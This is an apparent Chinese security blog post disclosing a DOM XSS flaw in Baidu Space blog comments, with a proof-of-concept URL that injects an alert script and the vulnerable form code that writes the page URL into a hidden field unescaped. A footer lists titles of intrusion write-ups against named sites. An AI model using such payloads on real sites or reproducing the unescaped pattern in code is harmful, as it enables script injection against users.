|
[组图]百度空间多处DOM XSS漏洞
XSS 3: 百度空间博客评论处DOM XSS
测试方法如下:
进入以下URL(用户名和帖子ID自己替换,别傻的直接点了然后告诉我测试无效):
以下是引用片段:
http://hi.baidu.com/testuser/blog/item/e3713128deadbabe99250a9e#‘><script>alert(/fvck+baidu/);</script><’
可以看到,我们的可爱的小框再次弹出来了!
有多少评论,这个小框就会弹多少次。
漏洞原因还是和XSS 2一样,如下:
表单中用js动态获取url
| 以下是引用片段: <form name=”form1″ id=”popFormSubmit” action=”/testuser/commit” method=”post” onSubmit=”return checkcmtform()”> <input type=”hidden” name=”ct” value=”8″> <input type=”hidden” name=”cm” value=”1″> <input type=”hidden” name=”spBlogID” value=”1f9a3aacaff38d0c4b36d6f5″> <script LANGUAGE=”JavaScript”> document.write(”<input type=’hidden’ name=’spRefURL‘ value=’”+window.location.href+”‘>”); </script> <div class=”tit”>发表评论:</div> <table width=”620″ border=”0″ cellspacing=”5″ cellpadding=”0″> <tr> |
如果说上面这个漏洞和前面的有点雷同的话,那么接下来讲的这个就有点细微的差别了。
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: